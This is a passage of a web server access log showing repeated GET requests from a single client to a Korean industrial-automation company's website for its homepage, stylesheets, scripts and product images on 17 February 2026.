Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10435] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:14:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10438] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:15:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10443] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:16:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10412] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:18:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10413] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10413] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 